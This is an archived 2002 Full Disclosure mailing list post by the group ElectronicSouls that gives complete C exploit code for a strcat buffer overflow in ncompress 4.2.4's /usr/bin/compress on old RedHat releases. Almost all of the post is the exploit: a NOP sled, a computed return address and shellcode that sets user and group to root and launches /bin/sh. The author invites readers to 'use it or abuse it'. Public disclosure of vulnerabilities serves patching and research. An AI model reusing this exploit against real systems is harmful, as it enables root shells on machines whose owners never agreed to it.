Full Disclosure mailing list archives
[ElectronicSouls] - /usr/bin/compress exploit
From: es () hush com
Date: Thu, 28 Nov 2002 23:13:17 -0800
-----BEGIN PGP SIGNED MESSAGE----- Dear List, Here is a proof-of-concept code demonstrating a vulnerability in /usr/bin/compress. Use it or abuse it. /* * PROOF OF CONCEPT * Information System Advancement in Penetration (ISAP) Labs * * (N)compress 4.2.4 Exploit * By: Lunar Fault [ElectronicSouls] * * Vulnerable Systems found is: RedHat 6.2, 7.0, 7.1, and 7.2 * * Discription: Simple unchecked b0f involving strcat. This * exploit was tested on RedHat 6.2, 7.0, and 7.1. This is only a * Proof of concept. /usr/bin/compress is not suid root by default. * * April 22, 2002 */ #include <stdio.h> #include <stdlib.h> #include <unistd.h> #define VULN "/usr/bin/compress" #define NOP 0x90909090 #define NOPLEN 500 /* Thanx to 0x90 for the shellcode :) */ /* Shellcode does a chuid(0), chgrp(0), then executes /bin/sh */ const unsigned char linux_x86_exec_hellcode[] = "\x29\xc0\xb0\x46\x29\xdb\xb3\x0c\x80\xeb\x0c\x89\xd9\xcd\x80\xeb\x18\x5e\x29" "\xc0\x88\x46\x07\x89\x46\x0c\x89\x76\x08\xb0\x0b\x87\xf3\x8d\x4b\x08\x8d\x53" "\x0c\xcd\x80\xe8\xe3\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68"; unsigned long get_sp(void) { __asm__(" mov %esp, %eax"); } void usage(char *prog) { printf("<+> (N)compress 4.2.4 Exploit\n"); printf("<+> By: Lunar Fault [ElectronicSouls]\n"); printf("<+> Information System Advancement in Penetration (ISAP) Labs\n"); printf("<!> usage: %s [options]\n", prog); printf("\t\t-h help\n"); printf("\t\t-o <offset> Example: 100\n"); printf("\t\t-r <return> Example: 0xbfffc680\n"); printf("\t\t-s <size> Example: 1056\n"); exit(1);} int main(int argv, char *argc[]) { int i, c, ret, offset; long len; char *buffer; offset = 0; len = 1056; ret = get_sp(); ret = ret - 250; /* Subtracting 250 from sp to bring the return somewhere in the NOP */ printf("<+> (N)compress 4.2.4 Exploit\n"); printf("<+> By: Lunar Fault [ElectronicSouls]\n"); printf("<+> Information System Advancement in Penetration (ISAP) Labs\n"); if (argv > 1) { while ((c = getopt (argv, argc, "r:s:o:h"))!=EOF) { switch(c) { case 'r': ret = strtoll(optarg, NULL, 0); break; case 's': len = atoi(optarg); if (len < (NOPLEN + strlen(linux_x86_exec_hellcode) + 100)) { printf("<!> Size is too small to work\n"); exit(1); } break; case 'o': offset = atoi(optarg); break; case 'h': usage(argc[0]); } } } buffer = (char *) malloc(len); ret = ret + offset; for (i=0;i<len;i+=4) *(long*) &buffer[i] = NOP; for (i=NOPLEN;i<len;i+=4) *(long*) &buffer[i] = ret; memcpy(buffer+NOPLEN, linux_x86_exec_hellcode, strlen(linux_x86_exec_hellcode)); printf("<*> Offset = %d\n", offset); printf("<*> Return = 0x%.8x\n", ret); printf("<*> Size = %d\n\n", len); execl(VULN, VULN, buffer, 0); return 0; } # The Electronic Souls Crew [ElectronicSouls] (c) 2002 "The end is now." -----BEGIN PGP SIGNATURE----- Version: Hush 2.2 (Java) Note: This signature can be verified at https://www.hushtools.com/verify wlMEARECABMFAj3nE50MHGVzQGh1c2guY29tAAoJEN5nGqhGcjlt2zUAoKzlEfXzhbiX 0IwM3GWiRfyNWub8AJ4zOt0daZO93e2HHyokvrfcS/vTQQ== =ABKy -----END PGP SIGNATURE----- Concerned about your privacy? Follow this link to get FREE encrypted email: https://www.hushmail.com/?l=2 Big $$$ to be made with the HushMail Affiliate Program: https://www.hushmail.com/about.php?subloc=affiliate&l=427 _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- [ElectronicSouls] - /usr/bin/compress exploit es (Nov 28)